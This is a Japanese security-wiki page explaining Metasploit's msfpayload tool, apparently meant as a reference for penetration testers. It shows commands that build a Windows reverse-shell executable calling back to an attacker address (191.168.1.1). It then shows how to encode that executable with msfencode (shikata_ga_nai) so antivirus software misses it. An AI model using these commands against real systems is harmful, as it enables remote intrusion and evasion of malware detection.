「msfpayload」の版間の差分
提供: セキュリティ
(ページの作成:「Metasploitのmsfpayload (MSF Payload)とは、Frameworkを使用せずにエクスプロイトのシェルコードや実行ファイルを作成でき...」) |
(相違点なし)
|
2013年12月21日 (土) 17:56時点における版
Metasploitのmsfpayload (MSF Payload)とは、Frameworkを使用せずにエクスプロイトのシェルコードや実行ファイルを作成できます。
読み方
- msfpayload
- えむえすえふ ぺいろーど
概要
シェルコードは、C言語、Ruby、JavaScript、VBA などのフォーマットで生成できます。
使い方
コマンドラインオプション
root@kali:~# msfpayload -h Usage: /opt/metasploit/apps/pro/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]> OPTIONS: -h Help banner -l List available payloads
モジュールのオプションの調べ方
モジュールのオプションの調べるには、 O を使用します。
root@kali:~# msfpayload windows/shell_reverse_tcp O Name: Windows Command Shell, Reverse TCP Inline Module: payload/windows/shell_reverse_tcp Platform: Windows Arch: x86 Needs Admin: No Total size: 314 Rank: Normal Provided by: vlad902 <vlad902@gmail.com> sf <stephen_fewer@harmonysecurity.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Description: Connect back to attacker and spawn a command shell
実行ファイルの作り方
Windows用の実行ファイルを作る場合は、 msfpayloadにXを指定します。
root@kali:~# msfpayload windows/shell_reverse_tcp LHOST=191.168.1.1 X > test_payload.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/shell_reverse_tcp Length: 314 Options: {"LHOST"=>"191.168.1.1"} root@kali:~# file test_payload.exe test_payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows
ウイルス対策ソフトに検知されないために
msfpayloadで作成したファイルは、ウイルス対策ソフトに検知されてしまうかもしれません。 そういった場合には、msfencodeで検出されないように変換を行います。
root@kali:~# msfpayload windows/shell_reverse_tcp LHOST=191.168.1.1 X | msfencode -e x86/shikata_ga_nai -t exe > test_payload2.exe
msfencodeの詳細については、msfencodeをご参照ください。